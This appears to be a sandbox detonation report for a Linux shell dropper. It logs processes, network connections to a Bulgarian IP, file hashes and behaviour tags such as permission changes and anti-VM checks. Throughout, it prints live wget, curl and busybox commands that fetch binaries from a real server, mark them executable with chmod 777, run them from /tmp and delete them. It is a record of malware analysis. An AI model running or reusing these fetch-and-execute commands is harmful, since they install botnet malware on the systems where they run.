/bin/chmod

[chmod 777 hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU

[./hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/bin/rm

[rm hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU]

/usr/bin/wget

[wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/chmod

[chmod 777 LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo

[./LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/bin/rm

[rm LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo]

/usr/bin/wget

[wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/chmod

[chmod 777 waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF

[./waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/bin/rm

[rm waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF]

/usr/bin/wget

[wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/chmod

[chmod 777 quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0

[./quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/bin/rm

[rm quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/chmod

[chmod 777 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD

[./0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/bin/rm

[rm 0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/chmod

[chmod 777 xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF

[./xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/bin/rm

[rm xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/wget

[wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/chmod

[chmod 777 CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs

[./CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/bin/rm

[rm CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs]

/usr/bin/wget

[wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/chmod

[chmod 777 jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa

[./jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/bin/rm

[rm jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/chmod

[chmod 777 DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB

[./DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/bin/rm

[rm DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/chmod

[chmod 777 ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S

[./ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

/bin/rm

[rm ZaCmBj05noshx614szHWsFSt4WhLb0wu7S]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 89.187.167.3:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-28 02:34

Reported

2024-10-28 02:36

Platform

debian9-armhf-20240611-en

Max time kernel

33s

Max time network

34s

Command Line

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K N/A
N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU N/A
N/A /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo N/A
N/A /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF N/A
N/A /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 N/A
N/A /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD N/A
N/A /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt N/A
N/A /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF N/A
N/A /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs N/A
N/A /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa N/A
N/A /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms N/A
N/A /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB N/A
N/A /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/0aqU8R5HGJK6Gy8ddl6f8xZLaxaxTW3YUD /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/DClRpPhKWm7jbpiA8C2DV4zvRlujWEQheB /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/quWUuwIzy6vsLENFXXKqVqPpjy54CzVvZ0 /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A
File opened for modification /tmp/OCP0uncNiHBP8NIcR9Le7eSSwiLPi1wT4K /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/jvViiUTrVHYbd3MPLT2sqvuMltbJsZTUOa /usr/bin/curl N/A
File opened for modification /tmp/ZaCmBj05noshx614szHWsFSt4WhLb0wu7S /usr/bin/curl N/A
File opened for modification /tmp/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF /usr/bin/curl N/A
File opened for modification /tmp/qCtRgxIpi33SQYgZrZeXHBwb5JqVl9PC1f /usr/bin/curl N/A
File opened for modification /tmp/LuIg7oxtWX8Oz8cK0UrnvBBrpNbcYca6qo /usr/bin/curl N/A
File opened for modification /tmp/CApM71rTkzSjYcX0rpnoxmCwpYe4hB9BRs /usr/bin/curl N/A
File opened for modification /tmp/hasZYOoq1Mr6rt2kBkyFmPc9kRyLEYUtHU /usr/bin/curl N/A
File opened for modification /tmp/waAPo0qq3lo5zSiiYrKkRFSOLMterXjzXF /usr/bin/curl N/A
File opened for modification /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt /usr/bin/curl N/A

Processes

/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh

[/tmp/56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/chmod

[chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

[./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/bin/rm

[rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms]

/usr/bin/wget

[wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/chmod

[chmod 777 zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

[./zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/bin/rm

[rm zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt]

/usr/bin/wget

[wget http://87.120.126.196/bins/xVq2EhWxzvf5Gccyzr98v9YbrJkL9zYNVF]

/usr/bin/curl

